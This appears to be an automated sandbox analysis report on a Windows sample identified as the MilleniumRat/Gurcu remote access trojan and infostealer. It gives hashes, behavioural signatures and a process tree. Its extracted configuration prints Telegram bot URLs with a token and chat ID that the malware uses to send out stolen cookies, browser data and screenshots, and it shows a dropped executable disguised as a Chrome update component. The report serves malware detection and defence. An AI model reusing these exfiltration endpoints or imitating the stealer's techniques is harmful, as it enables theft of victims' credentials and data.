Analysis
-
max time kernel
134s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-12-2024 16:54
Static task
static1
Behavioral task
behavioral1
Sample
1d0701d8fdc16df25fa0249b59aab042.exe
Resource
win7-20240903-en
General
-
Target
1d0701d8fdc16df25fa0249b59aab042.exe
-
Size
5.6MB
-
MD5
1d0701d8fdc16df25fa0249b59aab042
-
SHA1
6028426f7e0a712a1aeae28d986337aafae26abe
-
SHA256
a129d94c366e0caa9a024b5846031b331b5ea7526915299cac3c60c0a79fdde9
-
SHA512
f1e2cf861b86af37094192c7d110640c630944cee00542c7133fce703584e4ed08a3dae76c0c1afd30c4890e66d482fcc17c1eeb434ec711586c7ff0130c9e17
-
SSDEEP
98304:tJRl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcA:tWOuK6mn9NzgMoYkSIvUcwti7TQlvciP
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendMessage?chat_id=7538374929
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/getUpdates?offset=-
https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Milleniumrat family
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 1d0701d8fdc16df25fa0249b59aab042.exe -
Executes dropped EXE 1 IoCs
pid Process 3324 Regkey.exe -
Loads dropped DLL 2 IoCs
pid Process 4868 1d0701d8fdc16df25fa0249b59aab042.exe 3324 Regkey.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 10 raw.githubusercontent.com 11 raw.githubusercontent.com 24 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4068 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Regkey.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Regkey.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4400 timeout.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 4868 1d0701d8fdc16df25fa0249b59aab042.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe 3324 Regkey.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4868 1d0701d8fdc16df25fa0249b59aab042.exe Token: SeDebugPrivilege 4068 tasklist.exe Token: SeDebugPrivilege 3324 Regkey.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3324 Regkey.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4868 wrote to memory of 2604 4868 1d0701d8fdc16df25fa0249b59aab042.exe 86 PID 4868 wrote to memory of 2604 4868 1d0701d8fdc16df25fa0249b59aab042.exe 86 PID 2604 wrote to memory of 824 2604 cmd.exe 88 PID 2604 wrote to memory of 824 2604 cmd.exe 88 PID 2604 wrote to memory of 4068 2604 cmd.exe 89 PID 2604 wrote to memory of 4068 2604 cmd.exe 89 PID 2604 wrote to memory of 2960 2604 cmd.exe 90 PID 2604 wrote to memory of 2960 2604 cmd.exe 90 PID 2604 wrote to memory of 4400 2604 cmd.exe 95 PID 2604 wrote to memory of 4400 2604 cmd.exe 95 PID 2604 wrote to memory of 3324 2604 cmd.exe 96 PID 2604 wrote to memory of 3324 2604 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d0701d8fdc16df25fa0249b59aab042.exe"C:\Users\Admin\AppData\Local\Temp\1d0701d8fdc16df25fa0249b59aab042.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpC832.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpC832.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:824
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4868"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:2960
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:4400
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Regkey.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Regkey.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3324
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
286B
MD57b9c679c7b0324592e83f5f1edadd2f4
SHA1ef7374c9e39e99e086d13e7a0dbff46f4b0547d0
SHA256adc2075f93a2e91fbcb8f1a19d4c0f74c14eb4b179c52889220b2dedfa64a7b4
SHA512a0211c389970fd8dd2a4281ff468a8a4663594f965721a1acdec678e249b606407b49791b39a01c7086bb665349e6fa0bdbf47f5bc40f99000fde772aee0049d
-
Filesize
5.6MB
MD51d0701d8fdc16df25fa0249b59aab042
SHA16028426f7e0a712a1aeae28d986337aafae26abe
SHA256a129d94c366e0caa9a024b5846031b331b5ea7526915299cac3c60c0a79fdde9
SHA512f1e2cf861b86af37094192c7d110640c630944cee00542c7133fce703584e4ed08a3dae76c0c1afd30c4890e66d482fcc17c1eeb434ec711586c7ff0130c9e17